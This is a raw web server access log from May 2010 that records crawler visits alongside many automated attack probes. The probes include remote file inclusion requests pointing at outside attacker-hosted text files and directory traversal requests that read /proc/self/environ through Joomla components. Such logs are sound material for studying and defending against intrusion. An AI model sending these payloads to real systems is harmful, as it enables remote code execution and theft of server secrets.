80.65.166.74 - - [27/May/2010:23:37:12 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.65.166.74 - - [27/May/2010:23:37:12 -0500] "GET /logs/access_log.1271030400//bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
80.65.166.74 - - [27/May/2010:23:37:12 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.141 - - [27/May/2010:23:38:28 -0500] "GET /logs/access_log.1240444800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.143.166 - - [27/May/2010:23:38:42 -0500] "GET /logs/access_log.1273363200//box_display.php?box=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.221.143.166 - - [27/May/2010:23:38:42 -0500] "GET //box_display.php?box=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.143.166 - - [27/May/2010:23:38:43 -0500] "GET /logs//box_display.php?box=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
212.47.221.153 - - [27/May/2010:23:38:52 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [27/May/2010:23:39:03 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [27/May/2010:23:39:08 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
80.65.166.74 - - [27/May/2010:23:39:17 -0500] "GET /logs/access_log.1271030400//bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
80.65.166.74 - - [27/May/2010:23:39:17 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.65.166.74 - - [27/May/2010:23:39:17 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.195.112.180 - - [27/May/2010:23:40:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [27/May/2010:23:40:10 -0500] "GET /logs/access_log.1194134400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [27/May/2010:23:41:11 -0500] "GET /logs/access_log.1213660800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:05 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:06 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:42:06 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
187.45.193.159 - - [27/May/2010:23:42:30 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=113&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
187.45.193.159 - - [27/May/2010:23:42:31 -0500] "GET //index.php?option=com_myblog&Itemid=113&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [27/May/2010:23:42:31 -0500] "GET /logs//index.php?option=com_myblog&Itemid=113&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.133.201.194 - - [27/May/2010:23:43:29 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:23:43:29 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:23:43:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.228.226.12 - - [27/May/2010:23:43:38 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [27/May/2010:23:43:39 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [27/May/2010:23:43:39 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.226.12 - - [27/May/2010:23:43:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.55.65.134 - - [27/May/2010:23:45:07 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:45:08 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [27/May/2010:23:45:08 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
222.122.52.80 - - [27/May/2010:23:46:18 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:18 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:18 -0500] "GET /logs/access_log.1262563200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:33 -0500] "GET /logs/access_log.1270598400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:35 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:35 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:35 -0500] "GET /logs/access_log.1262563200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:40 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:40 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:40 -0500] "GET /logs/access_log.1262563200//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
120.50.40.133 - - [27/May/2010:23:46:46 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [27/May/2010:23:46:47 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [27/May/2010:23:46:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
120.50.40.133 - - [27/May/2010:23:46:49 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
222.122.52.80 - - [27/May/2010:23:46:53 -0500] "GET /logs/access_log.1270598400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.122.52.80 - - [27/May/2010:23:46:59 -0500] "GET /logs/access_log.1270598400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://darknez.interfree.it/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
174.133.201.194 - - [27/May/2010:23:47:34 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.65.134 - - [27/May/2010:23:48:20 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.133.201.194 - - [27/May/2010:23:48:47 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:23:48:47 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [27/May/2010:23:48:47 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
220.181.7.36 - - [27/May/2010:23:48:48 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [27/May/2010:23:49:33 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [27/May/2010:23:51:38 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.228.226.12 - - [27/May/2010:23:52:00 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [27/May/2010:23:52:00 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [27/May/2010:23:52:00 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
211.174.62.150 - - [27/May/2010:23:52:39 -0500] "GET /phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:23:52:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:23:52:39 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
67.195.112.180 - - [27/May/2010:23:52:54 -0500] "GET /logs/access_log.1174521600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
120.50.40.133 - - [27/May/2010:23:53:01 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [27/May/2010:23:53:01 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
211.174.62.150 - - [27/May/2010:23:53:02 -0500] "GET /phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:23:53:02 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.174.62.150 - - [27/May/2010:23:53:02 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
120.50.40.133 - - [27/May/2010:23:53:02 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
211.174.62.150 - - [27/May/2010:23:53:20 -0500] "GET /logs/access_log.1262649600/phphtml.php?htmlclass_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.52 - - [27/May/2010:23:53:29 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.124.120.23 - - [27/May/2010:23:54:10 -0500] "GET /logs/access_log.1270771200/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.124.120.23 - - [27/May/2010:23:54:11 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
94.124.120.23 - - [27/May/2010:23:54:11 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.124.120.23 - - [27/May/2010:23:54:15 -0500] "GET /logs/access_log.1270598400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fimaonline.org/1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
67.228.226.12 - - [27/May/2010:23:55:45 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
88.191.94.188 - - [27/May/2010:23:57:01 -0500] "GET /logs/access_log.1271548800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 370 "-""Mozilla/5.0"
88.191.94.188 - - [27/May/2010:23:57:01 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
88.191.94.188 - - [27/May/2010:23:57:01 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
88.191.94.188 - - [27/May/2010:23:57:06 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
88.191.94.188 - - [27/May/2010:23:57:06 -0500] "GET /logs/access_log.1271548800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 370 "-""Mozilla/5.0"
88.191.94.188 - - [27/May/2010:23:57:06 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 348 "-""Mozilla/5.0"
120.50.40.133 - - [27/May/2010:23:58:40 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
66.249.71.144 - - [28/May/2010:00:00:15 -0500] "GET /icons/folder.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
204.152.200.50 - - [28/May/2010:00:01:41 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
120.50.40.133 - - [28/May/2010:00:01:49 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [28/May/2010:00:01:49 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [28/May/2010:00:01:50 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:00:02:12 -0500] "GET /logs/access_log.1179964800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
120.50.40.133 - - [28/May/2010:00:02:16 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.210.123.70 - - [28/May/2010:00:02:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
67.210.123.70 - - [28/May/2010:00:02:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
67.210.123.70 - - [28/May/2010:00:02:17 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
67.210.123.70 - - [28/May/2010:00:02:18 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.819"
89.17.201.144 - - [28/May/2010:00:03:38 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.79"
121.88.4.141 - - [28/May/2010:00:11:32 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:00:11:32 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:00:11:32 -0500] "GET /logs/access_log.1270771200/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.88.4.141 - - [28/May/2010:00:11:57 -0500] "GET /logs/access_log.1270598400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [28/May/2010:00:11:59 -0500] "GET /logs/access_log.1268524800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.245 - - [28/May/2010:00:15:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.245 - - [28/May/2010:00:15:52 -0500] "GET /artwork/jewelrybox-ballerina1.jpg HTTP/1.1" 200 50948 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.245 - - [28/May/2010:00:15:52 -0500] "GET /artwork/jewelrybox.htm HTTP/1.1" 200 827 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [28/May/2010:00:16:10 -0500] "GET /logs/access_log.1270857600//?sourcedir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.55.65.134 - - [28/May/2010:00:16:10 -0500] "GET /logs//?sourcedir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 200 7294 "-""Mozilla/5.0"
74.55.65.134 - - [28/May/2010:00:16:10 -0500] "GET //?sourcedir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
74.55.65.134 - - [28/May/2010:00:16:25 -0500] "GET /logs/access_log.1271808000//?sourcedir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.44.120.2 - - [28/May/2010:00:18:35 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:18:35 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:18:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:18:36 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.122.7.156 - - [28/May/2010:00:20:43 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.lv/search?q=Infanterie+Regiment+%22Piccolomini%22&hl=lv&client=firefox-a&rls=org.mozilla:en-US:official&channel=s&start=30&sa=N""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
195.122.7.156 - - [28/May/2010:00:20:44 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
209.44.120.2 - - [28/May/2010:00:21:22 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:21:22 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:21:22 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.55.65.134 - - [28/May/2010:00:21:32 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:21:34 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.133.201.194 - - [28/May/2010:00:21:44 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.228.226.12 - - [28/May/2010:00:21:45 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
209.44.120.2 - - [28/May/2010:00:21:50 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
204.152.200.50 - - [28/May/2010:00:23:43 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:00:23:43 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:00:23:43 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
87.250.255.243 - - [28/May/2010:00:24:11 -0500] "GET /logs/access_log.1200009600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
120.50.40.133 - - [28/May/2010:00:24:18 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
204.152.200.50 - - [28/May/2010:00:25:33 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
209.44.120.2 - - [28/May/2010:00:26:05 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:27:21 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:27:21 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
